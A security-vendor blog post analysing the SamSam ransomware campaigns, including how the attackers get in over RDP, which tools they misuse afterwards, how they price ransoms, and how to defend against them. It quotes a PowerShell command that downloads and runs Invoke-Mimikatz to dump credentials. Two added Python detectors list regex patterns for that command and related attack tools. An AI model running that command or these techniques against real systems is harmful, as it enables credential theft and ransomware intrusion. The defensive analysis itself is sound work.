Threats 101
Jonathan Crowe
May 2018

What Makes SamSam, the Ransomware that Crippled Atlanta, So Different


Despite being one of today's most active and damaging threats, many of the facts surrounding SamSam ransomware remain in the dark. Here's everything you need to know to protect your organization.

When news broke on March 22 that the City of Atlanta was grappling with a ransomware infection, it understandably made national headlines. Here was a major U.S. city being extorted by cybercriminals, its IT infrastructure devastated. Operations in five of the city's 13 departments were seriously disrupted, which triggered far-reaching, public-facing consequences. Residents couldn't pay water bills. Courts were unable to validate warrants. The police department and other city employees had to revert to filing paperwork by hand. Public wi-fi at the nation's busiest airport was down for two weeks. Years' worth of files and correspondence were reportedly lost.

But also lost in the midst of the fallout-focused coverage was the fact that this wasn't a typical ransomware infection. The variant used (SamSam) and the criminal group behind it ("Gold Lowell") stand apart in significant ways, from how targets are selected to how SamSam is delivered and deployed. 

As a result, many of the usual, generic tips for safeguarding against garden-variety ransomware (ex: train users not to open suspicious email attachments) don't apply to SamSam. And basic advice on how to mitigate active infections tends to underplay it in dangerous ways, too. 

The goal of this post is to shed additional light on SamSam so that organizations can gain a more accurate understanding of what they're actually up against and prepare themselves accordingly. To start, we first need to dismiss one of the biggest misconceptions when it comes to SamSam. 

SamSam isn't spread through phishing emails


Unlike many ransomware strains, SamSam isn't distributed in spam email campaigns. There's no tricking employees into clicking on links or email attachments they shouldn't. Instead, the attackers behind SamSam avoid user interaction altogether and take a more direct route to infection — they identify vulnerable servers that they can gain access to via weak or stolen credentials. 

They aren't alone in using this approach. Identifying systems with open ports that are exposing Remote Desktop Protocol (RDP), virtual network computing (VNC), or other vulnerable services is an extremely popular attack tactic, and it's made disturbingly easy thanks to scanning tools like Shodan, Nmap, and masscan. In fact, while it's easy to think of click-happy users as being the ultimate low-hanging fruit, one could argue exposed RDP connections represent an even easier way in for attackers — and an even bigger risk. 

The criminals behind CrySiS, LockCrypt, Shade, Apocalypse, and other ransomware variants have all homed in on RDP as their attack vector of choice, but few have done it as notoriously or as successfully as the threat group responsible for SamSam. Dubbed "Gold Lowell" by Dell's Secureworks, the attackers extorted at least $325,000 over the course of just four weeks in late December 2017 and early January 2018 alone.

Experts have attributed that success at least in part to the group's selection of targets, which tends to single out industries with reputations for outdated systems and software and/or smaller security budgets — think healthcare, education and local government. Another key ingredient is low tolerance for downtime, which, in an ideal situation for the attackers, translates into an eagerness to consider all options — including paying the ransom — in order to make the problem go away as quickly as possible.  

How SamSam attackers pick targets and gain access

As researchers at Secureworks explain, in the early days of SamSam (late 2015 — mid 2016), many of the group's targets were hospitals that had vulnerable Internet-facing JBoss systems. The group made use of an open-source JBoss exploitation tool called JexBoss, and in some cases took advantage of a CVE that dated back to 2010. Whether the actors pointedly targeted hospitals from the outset, however, is unclear. It may simply be that those were the majority of systems showing up in early vulnerability scans, and the group decided to continue focusing on hospitals following the initial success they had infecting and extorting ransom from them. 

Whatever the case, by 2017 the group had shifted tactics from exploiting JBoss vulnerabilities to brute-forcing or using stolen credentials to establish RDP connections. But healthcare remained — and continues to be — a popular target.

In April 2017, the attackers used an RDP brute force attack to infect Erie County Medical Center, a major hospital in Buffalo, New York, with SamSam. More than three months later, the hospital estimated the total cost of recovery from the attack had reached $10 million.

Thus far in 2018, confirmed victims of SamSam infections include two Indiana-based hospitals — Hancock Health and Adams Memorial Hospital — and electronic health records (EHR) provider Allscripts.


The other vertical that has seen the majority of (publicly reported) SamSam attacks this year is local governments and municipalities. In addition to Atlanta, that includes attacks on Farmington, NM and Davidson County, NC. The Colorado Department of Transportation was also infected with SamSam, not once but twice in the span of eight days.  

So is it safe to say healthcare and government organizations are the only ones being currently targeted? Not necessarily. 

One thing these two verticals have in common is that downtime tends to be public-facing, and therefore malware infections are generally difficult things to keep under wraps (in fact, for healthcare providers, public disclosure of ransomware and other malware infections is mandatory). So it could very well be that organizations in other verticals are getting infected with SamSam, too, but these attacks on healthcare and government organizations are the only ones making headlines (though an attack on Mississippi Valley State University in March made news, as well). 

Researchers at Secureworks suggest that's more likely the case, arguing that the group's attacks appear to be more opportunistic in nature, rather than limited solely to specific targets in specific industries chosen in advance. 

If that's the case, how do "opportunities" pop up on the attackers' radar, and how do organizations avoid becoming one?

Scanning for exposed RDP, VNC, and other vulnerable services 

As mentioned above, one option the attackers have is to use tools like Shodan, Nmap, and masscan to scan the Internet for systems that are exposed and vulnerable.

A quick scan using Shodan, for example, shows that there are currently over 3.2 million endpoints with RDP exposed.

The "top organizations" listed here are cloud, virtual, or physical hosting providers, which makes sense — the majority of exposed endpoints are likely hosted machines that require remote access.

For what it's worth, these results are actually a marked improvement on the numbers Rapid7 researcher Jon Hart got when he ran his own scan last August. Using Rapid7's Project Sonar, Hart determined there were over 4 million endpoints exposing RDP. Here's how he reacted:

"This number is shockingly high when you remember that this protocol is effectively a way to expose keyboard, mouse and ultimately a Windows desktop over the network. Furthermore, any RDP speaking endpoints discovered by this Sonar study are not applying basic firewall rules or ACLs to protect this service, which brings into question whether or not any of the other basic security practices have been applied to these endpoints." 

Even with that number down to 3.2 million, that's more than enough potential targets to keep attackers busy for a long, long time. Add in 535,000 endpoints with VNC exposed — 7,445 of which have authentication disabled — and it's clear there's no lack of opportunities for attackers to go poking around on remote systems, even if they have little-to-no technical expertise.

Conducting brute force attacks 

Once attackers set their sights on a system with Internet-facing RDP, the next step is to try gaining access using a wide range of commonly-used account names and passwords to see if any fit the bill. There are several tools available that automate these brute-force attempts, and researchers at Secureworks have found evidence that at least one of them — NLBrute — has been used in SamSam attacks.

Screenshots of NLBrute, an RDP brute-force tool used in some SamSam attacks. Source: Secureworks


As researcher Kevin Beaumont warns, brute-force attacks on exposed RDP servers aren't just prevalent, they're essentially a given. 

“Anybody who has setup a honeypot recently will know within seconds you will be getting hit with failed RDP logins. First they portscan, then thousands of login attempts arrive.”

Kevin Beaumont, "RDP Hijacking" 

Of course, brute-force attacks aren't the only way of accessing RDP or VNC accounts. Another option is to simply purchase access to accounts that have already been compromised.

Buying RDP access from underground marketplaces

Where can a criminal go to buy or sell access to compromised servers? xDedic is one of the most infamous options. Details of the dark web marketplace first came to light in a report from Kaspersky Labs published in June 2016, which revealed it to be a thriving platform with access to over 70,000 hacked RDP servers up for sale, some for as little as $2. 

Shortly after the report was issued, xDedic went offline, only to resurface on a Tor domain with more restricted access and, by some reports, even more hacked servers. Currently, new visitors to the site are informed that "registration is closed." To gain access, they have to either receive an invitation from a current member, contact the xDedic support team, or purchase an invite for $200. 

Membership provides access to a large, searchable database of servers, which can be filtered by geography, OS, date last checked, seller, etc. 


Screenshot of the xDedic marketplace. Source: Security researcher Bryan Campbell


The way xDedic works is by providing a platform for these compromised servers to be bought and sold by independent parties. That allows the developers of the marketplace to arguably stay one step removed since they aren't selling anything directly, themselves — although they do also provide additional tools attackers can use to make leveraging the hacked RDP servers more successful. One such tool, xDedicRDPPatch, enables the creation of new RDP user accounts to help attackers maintain access even if the original account's credentials are changed or the account gets deleted.

xDedicRDPPatch also serves as a direct link between xDedic and the group behind SamSam. Secureworks confirms the tool has been used in SamSam attacks, which raises the possibility and likelihood that the attackers have taken advantage of the site's other offerings (such as access to compromised RDP servers), as well.

Pricing for servers fluctuates based on a variety of factors, primarily geography and OS. Ex: Servers in European and North American countries tend to go for more money than servers in other parts of the world. Would-be buyers can also preview details such as whether the hacked account has admin privileges, what AV is installed, what browsers, etc. They can also check to make sure the account isn't blacklisted before they buy. You can see a video that shows what navigating xDedic looks like here.


A hacked RDP server for sale on xDedic. Source: Security researcher Bryan Campbell


When security researchers at Flashpoint analyzed the xDedic marketplace in August 2017, they found access for over 85,000 servers up for sale. Organizing the servers by vertical, they discovered the majority (nearly two-thirds) belonged to K-12 schools and universities.

It's likely no coincidence that attacks on schools have been on the rise, or that the other sectors with high shares of hacked servers — healthcare, legal, and government, especially — have been constant targets of ransomware attacks.  


The sectors with most hacked RDP servers for sale on xDedic. Source: Flashpoint


xDedic isn't the only marketplace for compromised RDP servers, however. Ultimate Anonymity Services (UAS) is another popular (if more limited) option. According to additional analysis conducted by Flashpoint, UAS posted over 35,000 RDP servers for sale in October 2017, with the majority concentrated in China, Brazil, and India (in comparison, the top countries for xDedic were the United States, Germany, and Ukraine).

Pricing on UAS is roughly similar to xDedic, with costs fluctuating based primarily on geography and OS. 

The pricing model for compromised RDP servers for sale on UAS. Source: Flashpoint


With access to so many compromised RDP servers so cheaply available, it's no surprise the criminals behind SamSam and other ransomware variants are flocking to RDP as an attack vector. 

Abusing legitimate tools to deploy SamSam throughout the network

Unlike the majority of commodity ransomware, SamSam deployment is neither automatic nor fully automated. The attackers take the time to actively investigate their targets first, and they manually abuse a variety of otherwise legitimate admin tools in order to set the stage for a successful infection. When they do launch the ransomware, it's only after they've had the chance to strategically deploy it throughout the compromised network to better ensure it has maximum effect.

In fact, in some investigated cases, the period of time between initial compromise and SamSam deployment has been a month or even longer.

To accomplish their goals, the attackers behind SamSam commonly engage in a variety of post-exploitation activities. Here are some of the most common. 

Elevating privileges with Mimikatz

In many cases, if the attackers have been able to gain access via RDP, chances are the account they've cracked or hijacked already provides them with admin privileges (xDedic allows customers to filter by server accounts with admin privileges, specifically). 

If that's not the case, however, elevating privileges becomes the first order of business. That's because having admin privileges is a prerequisite for many of the activities listed below.

One way researchers have observed SamSam attackers trying to get their hands on admin credentials is by utilizing the credential harvesting tool Mimikatz. Specifically, they've been spotted using PowerShell to download and launch the Invoke-Mimikatz module from the penetration testing framework PowerSploit:

powershell.exe iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent[.]com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz –DumpCreds

Once they have the right privileges, the attackers will often create new user accounts to provide them with additional access back into the network should the originally compromised account be disabled or the password changed. 

Reconnaissance with Hyena or csvde.exe 

Next on the attackers' to-do list is getting a better lay of the land. One approach they've used is downloading and using Hyena, a legitimate administration tool that allows them to scan the network and enumerate a wide variety of details about connected systems, including running services, configuration settings, and users. 


Hyena is a legitimate network administration tool SamSam attackers have been known to abuse. Source: SystemTools


Another approach Secureworks researchers have observed is the abuse of csvde.exe, a legitimate command-line tool that can import and export data from Active Directory Domain Services (AD DS) and save it to a .csv file. SamSam attackers have used csvde.exe to collect hostnames from AD DS, and subsequently deployed a batch file designed to ping each system, creating a list of machines they have access to.

Using PsExec, Wmiexec, and SMB to deploy and execute SamSam

At this point, the attackers can turn their attention to deploying SamSam far and wide throughout the network. To do so, they've been spotted using batch scripts in combination with legitimate remote process execution tools like PsExec, WMI (via Wmiexec.py), and, once again, RDP. 

In separate incidents, researchers have also reported seeing the attackers use reGeorg, a tool used for TCP tunneling through a SOCKS proxy, and Server Message Block (SMB) protocol to establish connections between systems prior to SamSam deployment. 

As a final point of preparation, the attackers have even been known to disable system security settings along with endpoint protection software to ensure SamSam will run without being quarantined or blocked. 

Encrypting files, deleting itself, and tampering with recovery

Once executed, SamSam will search out approximately 300 different file types and begin encrypting them based on file size (smallest files first). Once encryption is complete, its new mission is to remove all traces of itself (to prevent researchers from analyzing it) and to make recovering from the attack as miserable and difficult as possible. 

One trick it uses to tamper with recovery is launching SDelete (another legitimate Sysinternals tool) to wipe all free space on the disk, effectively zeroing out all traces of recently deleted files that could otherwise potentially be recovered. It then deletes the wiper (along with the main ransomware binary), and launches a second binary to hunt down and delete any backup files it can find, including backups on network-accessible drives. 
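Each tool in the chain described above leaves a process command line behind, so the stages can be tagged and correlated per host. The sketch below is an added example, not code from Secureworks or Barkly: the rule names, hosts, paths, and URL are constructed, and because the dwell time noted earlier can be a month or longer, stages are correlated with no time window.

```python
import re
from collections import defaultdict

# Stage rules derived from the tools this article names. They match on the
# command line, so arguments can still give away a renamed binary.
RULES = {
    "download-cradle": re.compile(r"\b(iex|invoke-expression)\b.*downloadstring", re.I),
    "credential-theft": re.compile(r"invoke-mimikatz", re.I),
    # csvde exports by default; -i switches to import, which is not recon.
    "ad-recon": re.compile(r"\bcsvde(\.exe)?\b(?!.*\s-i\b).*\s-f\s", re.I),
    "remote-exec": re.compile(
        r"psexe(c|svc)"                                     # PsExec or its service
        r"|-accepteula\b.*\s\\\\[\w.-]+"                    # renamed PsExec, UNC target
        r"|\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b",  # process launch via WMI
        re.I),
    "anti-recovery": re.compile(r"\bsdelete(64)?(\.exe)?\b.*\s-[cz]\b", re.I),
}

# Constructed process-creation records (for example from Security event 4688
# or Sysmon event 1). Every host, path and URL here is made up.
SAMPLE_EVENTS = [
    {"ts": "2018-02-01T02:14:09", "host": "SRV-APP01",
     "cmdline": r"powershell.exe iex (New-Object Net.WebClient).DownloadString("
                r"'https://example.invalid/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"},
    {"ts": "2018-02-03T01:40:55", "host": "SRV-APP01",
     "cmdline": r'csvde -f C:\Windows\Temp\hosts.csv -r "(objectClass=computer)" -l name'},
    {"ts": "2018-03-06T03:02:31", "host": "SRV-APP01",
     "cmdline": r"p.exe -accepteula \\FS01 -s cmd /c C:\Windows\Temp\r.bat"},
    {"ts": "2018-03-06T03:20:00", "host": "SRV-APP01",
     "cmdline": r"sdelete.exe -z C:"},
    # Routine admin activity that must not raise an alert on its own.
    {"ts": "2018-02-10T09:12:00", "host": "WS-HELPDESK",
     "cmdline": r"psexec \\WS-114 ipconfig /all"},
    {"ts": "2018-02-10T09:15:00", "host": "WS-HELPDESK",
     "cmdline": r"wmic os get caption"},
    {"ts": "2018-02-12T11:00:00", "host": "DC01",
     "cmdline": r"csvde -i -f C:\import\newusers.csv"},
]


def classify(cmdline):
    """Return the set of attack-chain stages a command line matches."""
    return {stage for stage, rx in RULES.items() if rx.search(cmdline)}


def correlate(events):
    """Map host -> {stage: first-seen timestamp}, with no time window."""
    per_host = defaultdict(dict)
    for ev in sorted(events, key=lambda e: e["ts"]):
        for stage in classify(ev["cmdline"]):
            per_host[ev["host"]].setdefault(stage, ev["ts"])
    return per_host


def alerts(events, min_stages=2):
    """Report hosts showing at least min_stages distinct stages."""
    out = []
    for host, stages in correlate(events).items():
        if len(stages) >= min_stages:
            ordered = sorted(stages, key=lambda s: (stages[s], s))
            out.append({"host": host, "stages": ordered,
                        "first_seen": min(stages.values())})
    return sorted(out, key=lambda a: a["host"])


if __name__ == "__main__":
    for alert in alerts(SAMPLE_EVENTS):
        print(alert)
```

A single PsExec run from a help desk machine stays below the threshold, while the server that shows credential theft, directory export, remote execution, and free-space wiping is reported once with the stages in order.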

Pricing the ransom demand just right

SamSam ransom note. Source: Secureworks

With the encryption and other damage complete, all that's left is for the attackers to drop the ransom note explaining that the only way to recover the files is to pay for the private decryption keys. 

The attackers provide victims with two payment options: 

  1. A specified Bitcoin amount for each affected machine they want decrypted
  2. One larger "discount" bulk price for decrypting all affected machines

In an attempt to establish they can be trusted, the attackers also invite victims to upload two encrypted files that they will decrypt for free as a "demo." 

The demand amounts have fluctuated since SamSam attacks started appearing in 2016 (as has the price of Bitcoin, obviously), but notable 2018 attacks on Farmington, NM (bulk demand: $45,470), Hancock Health (bulk demand: $55,000), and Atlanta (bulk demand: $51,000) provide a current ballpark figure for how costly these attacks can be for victims.

Those demands also appear to fall into a lucrative sweet spot for the attackers — it's enough money to make the attacks well worthwhile, yet it's also low enough in comparison to downtime and recovery costs that organizations will consider paying it. 

As Hancock Health SVP and Chief Strategy Officer Rob Matt explained when asked to elaborate on the hospital's decision to pay the ransom, "The amount of ransom was reasonable in respect to the cost of continuing downtime and not being able to care for patients."

"These folks have an interesting business model," Hancock Health CEO Steve Long added. "They make it just easy enough [to pay the ransom]. They price it right."

Why SamSam gives infected victims so much trouble

"The tools we have in place didn't work. It's ahead of our tools."

— Brandi Simmons, spokesperson for the Colorado Office of Information Technology regarding the CDOT's second SamSam infection in eight days

Many factors can play into an organization's ability (or inability) to recover from any ransomware infection, but SamSam attacks are notorious for being especially problematic. Seven weeks after the attack on Atlanta, the city is still recovering (online water bill payment systems were just restored on May 8). A SamSam attack on Erie County Medical Center in New York required over three months of recovery efforts, costing nearly $10 million.

One of the reasons these attacks are so damaging is that they are fundamentally different and more invasive by nature. With other ransomware, what you're dealing with is a piece of bad software programmed to follow limited, pre-defined instructions. With SamSam, on the other hand, what you're dealing with is bad people actively crawling all over your network. They probe for opportunities and weaknesses. They adapt to obstacles and restrictions. They react and create workarounds. They've even been known to fight back against removal attempts and subvert recovery operations. 

During the SamSam attack on the Colorado Department of Transportation (CDOT), for example, attackers saw that the organization was attempting to move forward with third-party recovery efforts instead of paying the ransom. They reacted by leveraging an additional user account or other access point they had created to successfully infect the CDOT a second time, this time using a slightly modified version of SamSam that once again slipped past their antivirus solution (McAfee).

"We had 20 percent of the computers up and running when our security tools detected malicious activity," a spokesperson from the Colorado Office of Information Technology explained. "And sure enough the variant of SamSam ransomware just keeps changing. The tools we have in place didn't work. It's ahead of our tools." 

The live attacker component makes SamSam infections a different problem altogether — one that can't be solved by simply wiping a machine and restoring from backup. Until any and all access points the attackers are leveraging have been sniffed out and removed, there's nothing stopping infections from occurring over and over again, or nothing to prevent the attackers from deploying stealthier forms of malware (credential stealers, banking trojans, cryptominers, etc.). 

How to protect your organization against SamSam 

Step 1: Secure RDP

The best way to think about SamSam infections is to understand that they are symptoms of a bigger problem — attackers have managed to get active (and potentially highly privileged) access to your systems. Preventing that ugly situation in the first place should obviously be your primary goal, and as far as keeping SamSam attackers off your systems is concerned, securing RDP is a crucial first step. 

To prevent attackers from gaining access to servers via RDP, make sure you're doing the following:

  • When at all possible, avoid exposing RDP to the Internet (when in doubt you can use scanning tools like Nmap, masscan, and Shodan to see if you have any exposed ports — rest assured bad guys are already doing this, so take a few minutes to see what they see).  
  • Restrict RDP access behind firewalls and by using an RD Gateway or VPN
  • Use strong passwords and two-factor authentication
  • Limit users who can log in using remote desktop
  • Implement an account lockout policy to help thwart brute force attacks

For more information on securing RDP, see this guide from UC Berkeley.
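Lockout policy and strong passwords reduce the odds that a guess lands; the case to alert on is a burst of failed RDP logons from one address followed by a success. The following is an added example, not part of the original post: it assumes Windows Security events 4625 (failed logon) and 4624 (successful logon) already parsed into dictionaries, and the threshold, window, addresses, and account names are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED, SUCCESS = 4625, 4624
# 10 = RemoteInteractive (RDP). With Network Level Authentication, failed
# RDP logons are recorded as type 3 (Network), so both are watched.
RDP_LOGON_TYPES = {3, 10}


def detect_rdp_bruteforce(events, threshold=20, window=timedelta(minutes=5)):
    """Return {source_ip: finding} for IPs with >= threshold failures in window.

    A finding's "success" holds (user, timestamp) for the first successful
    logon from that IP after the burst, i.e. a guess that worked.
    """
    recent = defaultdict(deque)   # ip -> failure timestamps inside the window
    users = defaultdict(set)      # ip -> account names tried
    findings = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["logon_type"] not in RDP_LOGON_TYPES:
            continue
        ip, ts = ev["ip"], ev["ts"]
        q = recent[ip]
        while q and ts - q[0] > window:      # slide the window forward
            q.popleft()
        if ev["event_id"] == FAILED:
            q.append(ts)
            users[ip].add(ev["user"])
            if len(q) >= threshold:
                f = findings.setdefault(
                    ip, {"first_burst": ts, "peak": 0, "success": None})
                f["peak"] = max(f["peak"], len(q))
        elif ev["event_id"] == SUCCESS and ip in findings:
            if findings[ip]["success"] is None:
                findings[ip]["success"] = (ev["user"], ts)
    for ip, f in findings.items():
        f["users_tried"] = sorted(users[ip])
    return findings


T0 = datetime(2018, 3, 22, 4, 0, 0)
GUESSED_NAMES = ["administrator", "admin", "backup", "scanner"]


def sample_events():
    """Constructed events: one brute-force source, one user, console noise."""
    evs = [{"ts": T0 + timedelta(seconds=3 * i), "event_id": FAILED,
            "logon_type": 3, "ip": "203.0.113.50",
            "user": GUESSED_NAMES[i % 4]} for i in range(40)]
    evs.append({"ts": T0 + timedelta(seconds=125), "event_id": SUCCESS,
                "logon_type": 10, "ip": "203.0.113.50", "user": "backup"})
    # A legitimate user who mistypes twice, then logs in.
    for sec, eid in ((10, FAILED), (20, FAILED), (40, SUCCESS)):
        evs.append({"ts": T0 + timedelta(seconds=sec), "event_id": eid,
                    "logon_type": 10, "ip": "198.51.100.7", "user": "jsmith"})
    # Console (type 2) failures are not RDP and are ignored.
    evs += [{"ts": T0 + timedelta(seconds=i), "event_id": FAILED,
             "logon_type": 2, "ip": "-", "user": "kiosk"} for i in range(25)]
    return evs


if __name__ == "__main__":
    for ip, finding in detect_rdp_bruteforce(sample_events()).items():
        print(ip, finding)
```

A source that stays under the threshold is not reported by this check, which is where the account lockout policy in the list above does its work.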

Step 2: Limit access to other remote administration tools

Because SamSam attackers rely on abusing legitimate tools to deploy the ransomware throughout victim networks, preemptively limiting access to those tools and/or restricting their functionality can throw a wrench in those plans. 

Restricting the use of PsExec

Part of Microsoft's Sysinternals suite, PsExec provides remote command execution by connecting to the hidden ADMIN$ share on a remote system via Server Message Block (SMB) protocol, and starting the PsExecsvc service. PsExec does not come pre-loaded into Windows by default, so if it isn’t already present on a system it has to be installed. That provides an opportunity for blacklisting PsExec.exe and PsExecsvc.exe, though attackers have been known to use renamed versions of the program or versions that are PowerShell-based. The latter provide the same functionality, but instead of writing an executable to disk (which AVs can scan), they execute directly in memory.  

A potentially more effective approach than blacklisting is taking advantage of user account control (UAC) token filtering. For example, by enabling Admin Approval Mode (disabled by default) for the built-in administrator account, you can limit PsExec so all attempts to abuse it will fail unless initiated by a domain account. You can turn on Admin Approval Mode by enabling the following registry value:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken


Monitoring and responding to suspicious WMI activities

Next on the list is Windows Management Instrumentation (WMI). WMI provides administrators with a wide range of powerful capabilities, including locally or remotely executing scripts via its command line tool (wmic.exe) or PowerShell.

One way to combat malicious abuse is to fight WMI with WMI. As researcher Matt Graeber explains, WMI event subscriptions can be created that log and respond to suspicious WMI activities (examples here and here). In addition, if you don’t need to use remote WMI, set a fixed port for it and block it.

Step 3: Don't just rely on AV — use stronger, smarter endpoint security

This year's influx of successful SamSam infections makes it abundantly clear that relying on antivirus to block these attacks is a major liability. Barkly provides defense-in-depth against SamSam and other ransomware thanks to its patented combination of machine learning and real-time behavioral analysis. 

Not only does Barkly recognize and block SamSam payloads, it also blocks the types of malicious techniques SamSam attackers rely on to pull off their attacks. By preventing their attempt at harvesting credentials, for example, Barkly can thwart attackers before they have the chance to gain more access and dangerous capabilities.


As a result, Barkly protection extends across multiple points in the SamSam attack chain, providing organizations with defense-in-depth and blocking the ransomware before any files are encrypted.  


Barkly blocks SamSam, but also prevents malicious activity earlier in the attack chain. 


Step 4: Practice 3-2-1 backup

With SamSam attackers explicitly seeking out backups in order to encrypt or delete them, it's critical to make sure you have three copies of your data in two different locations, one of which is offsite/not network accessible. 

With more attacks to come, here's how to stay up-to-date

The criminals behind SamSam have been relatively quiet since the Atlanta attack in March, but there is no reason to believe the silence will last for long. As long as there are exposed RDP connections and other vulnerabilities calling out to them, they'll continue launching attacks. 

We'll continue following SamSam closely. For updates on it and other threats, sign up for the Barkly blog. You'll get 1-2 articles a week, including in-depth analysis like the post you just read, plus shorter alerts explaining what you need to know about the newest malware campaigns as they're discovered.

If you're looking for more actionable security tips, check out our new eBook, The Smart IT Pro's Essential Guide to Blocking Malware. It's free and has 35 pages full of checklists, quick wins, and practical advice for securing your company. 

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical point of view.
